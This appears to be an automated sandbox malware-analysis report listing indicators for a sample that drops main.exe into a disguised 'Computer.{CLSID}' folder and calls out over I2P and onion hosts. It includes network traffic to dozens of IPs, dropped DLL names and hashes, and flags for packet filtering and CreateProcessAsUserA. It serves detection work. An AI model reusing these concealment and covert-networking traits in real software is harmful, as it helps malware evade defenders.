Source: main.exe, 00000020.00000002.2913383515.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000003.2600230754.00000200A0506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/I
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/T
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/E
Source: libi2p.dll.21.dr	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: update.pkg.10.dr	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Source: w8m7wmyk939oczmkw4o2h16hs.exe.1.dr

Static PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0

Source: unknown

Network traffic detected: IP country count 25

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 45.200.148.158:1129
Source: global traffic	TCP traffic: 192.168.2.4:49808 -> 15.204.11.249:11623
Source: global traffic	TCP traffic: 192.168.2.4:49809 -> 51.83.132.16:20700
Source: global traffic	TCP traffic: 192.168.2.4:49810 -> 185.82.217.48:14412
Source: global traffic	TCP traffic: 192.168.2.4:49811 -> 194.54.156.174:1941
Source: global traffic	TCP traffic: 192.168.2.4:49812 -> 80.76.34.140:14505
Source: global traffic	TCP traffic: 192.168.2.4:49813 -> 88.228.207.122:16453
Source: global traffic	TCP traffic: 192.168.2.4:49814 -> 5.181.20.93:26893
Source: global traffic	TCP traffic: 192.168.2.4:49820 -> 125.212.237.207:9325
Source: global traffic	TCP traffic: 192.168.2.4:49821 -> 66.176.202.101:17154
Source: global traffic	TCP traffic: 192.168.2.4:49822 -> 38.40.94.251:28976
Source: global traffic	TCP traffic: 192.168.2.4:49823 -> 46.0.4.103:18202
Source: global traffic	TCP traffic: 192.168.2.4:49824 -> 81.162.25.200:30484
Source: global traffic	TCP traffic: 192.168.2.4:50036 -> 85.242.211.221:37987
Source: global traffic	TCP traffic: 192.168.2.4:50037 -> 212.116.61.165:24605
Source: global traffic	TCP traffic: 192.168.2.4:50038 -> 173.68.123.78:25043
Source: global traffic	TCP traffic: 192.168.2.4:50039 -> 95.164.4.146:21309
Source: global traffic	TCP traffic: 192.168.2.4:50040 -> 59.110.52.4:11876
Source: global traffic	TCP traffic: 192.168.2.4:50041 -> 193.34.123.42:11721
Source: global traffic	TCP traffic: 192.168.2.4:50042 -> 188.120.244.218:2632
Source: global traffic	TCP traffic: 192.168.2.4:50043 -> 110.239.62.148:22444
Source: global traffic	TCP traffic: 192.168.2.4:50044 -> 104.244.227.121:11334
Source: global traffic	TCP traffic: 192.168.2.4:50045 -> 89.35.131.34:31750
Source: global traffic	TCP traffic: 192.168.2.4:50046 -> 107.161.80.18:5022
Source: global traffic	TCP traffic: 192.168.2.4:50047 -> 37.120.171.64:29956
Source: global traffic	TCP traffic: 192.168.2.4:50048 -> 85.24.237.45:18608
Source: global traffic	TCP traffic: 192.168.2.4:50050 -> 82.64.105.181:13166
Source: global traffic	TCP traffic: 192.168.2.4:50051 -> 173.249.2.110:52911
Source: global traffic	TCP traffic: 192.168.2.4:50052 -> 23.137.250.43:24642
Source: global traffic	TCP traffic: 192.168.2.4:50053 -> 81.136.49.129:28063
Source: global traffic	TCP traffic: 192.168.2.4:50054 -> 50.35.91.100:27295
Source: global traffic	TCP traffic: 192.168.2.4:50055 -> 195.52.175.104:28212
Source: global traffic	TCP traffic: 192.168.2.4:50056 -> 68.149.143.121:10687
Source: global traffic	TCP traffic: 192.168.2.4:50057 -> 78.46.239.124:6802
Source: global traffic	TCP traffic: 192.168.2.4:50058 -> 78.58.99.133:29641
Source: global traffic	TCP traffic: 192.168.2.4:50059 -> 73.247.24.93:4965
Source: global traffic	TCP traffic: 192.168.2.4:50061 -> 149.106.159.60:11959
Source: global traffic	TCP traffic: 192.168.2.4:50062 -> 72.68.225.51:16190
Source: global traffic	TCP traffic: 192.168.2.4:50063 -> 81.168.83.201:18290
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 67.223.218.98:27892
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 118.211.240.78:27644
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 190.62.46.158:9548
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 157.161.57.70:17777
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 162.19.153.65:18297
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 100.4.223.210:25303
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 108.180.0.49:25004
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 89.66.70.5:26711
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 93.94.147.180:28372
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 87.180.222.251:19608
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 173.59.19.119:13311
Source: global traffic	UDP traffic: 192.168.2.4:18686 -> 95.188.183.13:17107
Source: global traffic	UDP traffic: 192.168.2.4:9525 -> 116.202.17.147:25190
Source: global traffic	UDP traffic: 192.168.2.4:9525 -> 123.57.221.156:9920
Source: global traffic	UDP traffic: 192.168.2.4:9525 -> 194.110.247.42:27073
Source: global traffic	UDP traffic: 192.168.2.4:9525 -> 120.26.218.134:11856

Source: Joe Sandbox View

ASN Name: XTOMxTomEU XTOMxTomEU

Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 21_2_00007FFE0E162A1A recv,WSAGetLastError,

21_2_00007FFE0E162A1A

Source: global traffic	HTTP traffic detected: GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close

Source: global traffic	DNS traffic detected: DNS query: reseed.i2pgit.org
Source: global traffic	DNS traffic detected: DNS query: reseed.diva.exchange

Source: main.exe, 00000020.00000003.2586057584.00000200A04A8000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: http://127.0.0.1:8118
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, 00000020.00000003.2599837625.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599705548.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599641838.00000200A08F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2600230754.00000200A0506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: update.pkg.10.dr	String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtC
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: http://rus.i2p/hosts.txt
Source: update.pkg.10.dr	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtn
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://banana.incognet.io/;
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://i2p.ghativega.in/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i2p.ghativega.in/b.cW
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://i2p.novg.net/
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: main.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/i
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-pl.i2pd.xyz/d
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed.diva.exchange/
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr	String found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org/9
Source: main.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su3
Source: main.exe, 00000015.00000003.1876236118.000001DE39E3A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000003.1876537527.000001DE39E39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.memcpy.io/b.ci
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/6
Source: main.exe, main.exe, 00000020.00000002.2913383515.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/E
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/I
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/T
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/b
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/s
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://reseed2.i2p.net/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/r
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.dr	String found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.mk16.de/76
Source: main.exe, 00000015.00000002.2482716452.000001DE39DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.mk16.de/8

Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CC929A inet_addr,ntohl,

5_2_00007FF764CC929A

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CC292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,

5_2_00007FF764CC292E

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File deleted: C:\Windows\Temp\Z8JRj7qu

Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_029953EA	0_2_029953EA
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_02985B3E	0_2_02985B3E
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_02984B4A	0_2_02984B4A
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_029860CE	0_2_029860CE
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_0299701E	0_2_0299701E
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_0299D122	0_2_0299D122
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_02987F2E	0_2_02987F2E
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_02989CF6	0_2_02989CF6
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_0298CDA6	0_2_0298CDA6
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: 5_2_00007FF764CCDE8A	5_2_00007FF764CCDE8A
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: 5_2_00007FF764CCE4E0	5_2_00007FF764CCE4E0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FF76A90C4C0	21_2_00007FF76A90C4C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FF76A912098	21_2_00007FF76A912098
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0E1709C0	21_2_00007FFE0E1709C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0EB525F0	21_2_00007FFE0EB525F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE1150F020	21_2_00007FFE1150F020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE11ECEB40	21_2_00007FFE11ECEB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE117809C0	32_2_00007FFE117809C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11BE25F0	32_2_00007FFE11BE25F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11ECF020	32_2_00007FFE11ECF020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE126DEB40	32_2_00007FFE126DEB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1320A8B5	32_2_00007FFE1320A8B5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1320A78B	32_2_00007FFE1320A78B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1320A643	32_2_00007FFE1320A643
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE13210710	32_2_00007FFE13210710
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1320A558	32_2_00007FFE1320A558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1330CBC0	32_2_00007FFE1330CBC0

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll 5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll 64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266

Source: C:\Windows\System32\icacls.exe

Process token adjusted: Security

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11501292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11EC1292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE13201292 appears 377 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE1330A202 appears 345 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0E161292 appears 462 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11BD1292 appears 515 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE126D2FD2 appears 387 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11771292 appears 462 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11EC2FD2 appears 387 times
